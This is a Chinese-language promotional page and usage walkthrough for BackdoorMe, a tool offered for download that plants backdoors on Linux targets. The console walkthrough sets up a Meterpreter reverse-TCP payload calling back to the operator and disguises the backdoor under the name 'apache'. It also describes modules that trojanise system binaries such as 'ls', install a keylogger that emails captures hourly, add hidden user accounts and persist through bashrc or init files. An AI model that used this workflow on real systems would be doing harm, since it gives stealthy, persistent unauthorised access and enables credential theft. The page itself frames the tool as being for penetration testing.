BackdoorMe是一款功能强大的自动化后门工具,用于渗透测试!很明显,软件是带有攻击性的,严禁用于非法用途。该工具目前使用了metasploit接口,以后会慢慢淡化接口,增强自身特色。需要的朋友下!
什么是后门程序
后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法。在软件的开发阶段,程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。但是,如果这些后门被其他人知道,或是在发布软件之前没有删除后门程序,那么它就成了安全风险,容易被黑客当成漏洞进行攻击。
后门程序又称特洛依木马,其用途在于潜伏在电脑中,从事搜集信息或便于黑客进入的动作。后门程序和电脑病毒最大的差别,在于后门程序不一定有自我复制的动作,也就是后门程序不一定会“感染”其它电脑。
BackdoorMe有哪些功能模块
其内置了Backdoors(后门)、Modules(模块)和Auxiliaries(辅助模块)
Bash
Bash2 (依赖更多)
Metasploit
Netcat
Netcat-traditional
Perl
Php (非WEB后门,但使用了WEB模块)
Pupy
Python
Web (php –WEB后门)
BackdoorMe怎么用
在安装backdoorme之前,请先确保您准备好了所有的依赖包。
$ python dependencies.py
启动backdoorme:
$ python master.py 聽 聽 ___ 聽 聽 聽 聽 聽 __ 聽 聽 聽__ 聽 聽 聽 聽 聽 聽 聽__ 聽___ 聽 聽/ _ )___ _____/ /_____/ /__ 聽___ 聽____/ 聽|/ 聽/__ 聽 / _ 聽/ _ `/ __/ 聽'_/ _ 聽/ _ \/ _ \/ __/ /|_/ / -_) 聽/____/\_,_/\__/_/\_\\_,_/\___/\___/_/ /_/ 聽/_/\__/ 聽Welcome to BackdoorMe, a powerful backdooring utility. Type "help" to see the list of available commands. 聽Type "addtarget" to set a target, and "open" to open an SSH connection to that target. 聽Using local IP of 10.1.0.1. 聽>>
加入target:
>> addtarget 聽Target Hostname: 10.1.0.2 聽Username: victim 聽Password: password123 聽 + Target 1 Set! 聽>>
Backdoor
请输入“use”关键词来使用后门:
>> use metasploit 聽+ Using current target 1. 聽 + Using Metasploit backdoor... 聽(msf) >>
从从这儿开始,你可以设置后门相关选项,运行“show options”或者“help”,来查看需要配置的参数。这里设置选项,用“set”就行了。
(msf) >> show options 聽Backdoor options: 聽 聽Option 聽 聽 聽Value 聽 聽 聽 Description 聽 聽 Required 聽------ 聽 聽 聽----- 聽 聽 聽 ----------- 聽 聽 -------- 聽name 聽 聽 聽 聽initd 聽 聽 聽 name of the backdoor 聽 聽 聽 聽False 聽format 聽 聽 聽elf 聽 聽 format to write the backdoor to 聽 聽 True 聽lhost 聽 聽 聽 10.1.0.1 聽 聽 聽 聽local IP to connect back to 聽 聽 True 聽encoder 聽 聽 none 聽 聽 聽 聽encoder to use for the backdoor 聽 聽 False 聽lport 聽 聽 聽 4444 聽 聽 聽 聽local port to connect back on 聽 聽 聽 True 聽payload 聽 聽 linux/x86/meterpreter/reverse_tcp 聽 聽 聽 payload to deploy in backdoor 聽 聽 聽 True 聽(msf) >> set name apache 聽 + name => apache 聽(msf) >> show options 聽Backdoor options: 聽 聽Option 聽 聽 聽Value 聽 聽 聽 Description 聽 聽 Required 聽------ 聽 聽 聽----- 聽 聽 聽 ----------- 聽 聽 -------- 聽name 聽 聽 聽 聽apache 聽 聽 聽name of the backdoor 聽 聽 聽 聽False 聽...
Modules
每个后门在添加了额外的模块后,会变得更加有效。要添加一个模块,只需要使用“add”。
(msf) >> add poison 聽 + Poison module added
每个模块都有额外的参数可以定制,如果运行了“help”,你可以看到或者设置任何附加选项。
(msf) >> help 聽... 聽Poison module options: 聽 聽Option 聽 聽 聽Value 聽 聽 聽 Description 聽 聽 Required 聽------ 聽 聽 聽----- 聽 聽 聽 ----------- 聽 聽 -------- 聽name 聽 聽 聽 聽ls 聽 聽 聽 聽name of command to poison 聽 聽 False 聽location /bin 聽 聽 聽 where to put poisoned files into 聽 聽 聽 聽False
现在能启用的模块包括:
Poison:
感染目标计算机上的可执行文件,它会编译一个exe,把原有的程序变为后门。
比如,如果这个模块感染了“ls”,它会进行编译,然后把正常“ls”给变成后门“ls”,这样一来用户可以更频繁地运行“ls”后门。
Cron:
作用和做法同上。
Web:
启动WEB服务,放置存有后门的WEB页面,访问该网页则监听开始。
Keylogger:
植入键盘记录器,在配置时可以配入点自己邮件,每小时会收到结果。
User:
添加新用户。
Startup:
可以将后门植入bashrc或者init文件。
Auxiliaries
为了更加隐蔽,某些用户可能会希望在目标机 器上使用特定的服务。应用auxiliary模块,使用“apply”即可。
>> apply user 聽+ User Auxiliary Module added.
Auxiliaries支持modules的使用,所有它们能更加隐蔽和频繁的运行。
>> (user) add startup 聽+ Startup Module added.
现有启用的auxiliaries包括:
User
在目标机器添加新用户。
Targets
Backdoorme支持同时操作多个目标,使用数字序号切换即可。比如,使用“use metasploit 2”命令,可以在目标“2”上使用msf。
下载仅供下载体验和测试学习,不得商用和正当使用。
下载体验